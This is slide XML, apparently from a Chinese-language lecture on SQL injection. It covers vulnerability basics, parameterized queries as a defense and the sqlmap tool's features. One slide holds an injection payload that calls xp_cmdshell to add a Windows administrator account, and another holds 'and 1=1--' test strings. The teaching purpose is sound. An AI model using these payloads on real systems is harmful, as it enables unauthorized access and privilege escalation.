              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>add';EXEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>master.dbo.xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 'net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Administrators test222 /add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'--</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2860871" y="3030328"/>
            <a:ext cx="6415604" cy="3001150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2358640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362074" y="160297"/>
            <a:ext cx="10344149" cy="2031325"/>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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>如何防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>注入？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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参数化查询：推荐。</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过滤危险字符：最好使用白名单，慎用黑名单。</a:t>
            </a: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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374364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362075" y="247846"/>
            <a:ext cx="10344149" cy="1846659"/>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参数化为何能防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>注入？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362075" y="958689"/>
            <a:ext cx="6266667" cy="2485714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362075" y="3552595"/>
            <a:ext cx="3257143" cy="952381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7007628" y="1396434"/>
            <a:ext cx="4015047" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句经过编译后变成一系列的迭代器，这一系列的迭代器组成一个语法树。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如果使用参数化查询，参数是在这个语法树生成之后传入的，不论参数传进去什么样的值都无法改变语法树的结构，也就无法执行计划外的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 14"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4796443" y="3760808"/>
            <a:ext cx="6042603" cy="1207382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4796443" y="5145580"/>
            <a:ext cx="6226232" cy="1280158"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362074" y="5048250"/>
            <a:ext cx="3257143" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2’and 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2’’and 1=1-- </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3884919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362074" y="334236"/>
            <a:ext cx="10344149" cy="1846659"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>自动化注入工具：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362073" y="1117590"/>
            <a:ext cx="10344150" cy="1338828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>要求：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.6+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>支持数据库：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlserver</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlite</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>firebird</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sybase</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>db2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://sqlmap.sourceforge.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362075" y="2952257"/>
            <a:ext cx="6096000" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>枚举用户、哈希口令、权限和数据库</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>便捷的转存储数据库的表／列</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用各种技术优化数据提取并减少攻击时间</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>运行自定义</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>读取任意文件及更多内容</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在操作系统层级运行命令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>getshell</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="图片 20"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246253" y="2731747"/>
            <a:ext cx="5778321" cy="3026344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54754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p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="202558"/>
            <a:ext cx="6884754" cy="584777"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584777"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584777"/>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a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4"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zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>背景知识</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="6"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7"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8" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="9"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10"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sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731533" y="1052740"/>
            <a:ext cx="8612943" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>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zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞是什么？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>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非常非常抽象的定义：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359955" y="2700145"/>
            <a:ext cx="10771428" cy="2857143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76142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362074" y="228392"/>
            <a:ext cx="10344149" cy="738664"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>更多</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2802689" y="967056"/>
            <a:ext cx="3731459" cy="5273384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2937060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p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="202558"/>
            <a:ext cx="6884754" cy="584777"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584777"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584777"/>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03</a:t>
              </a:r>
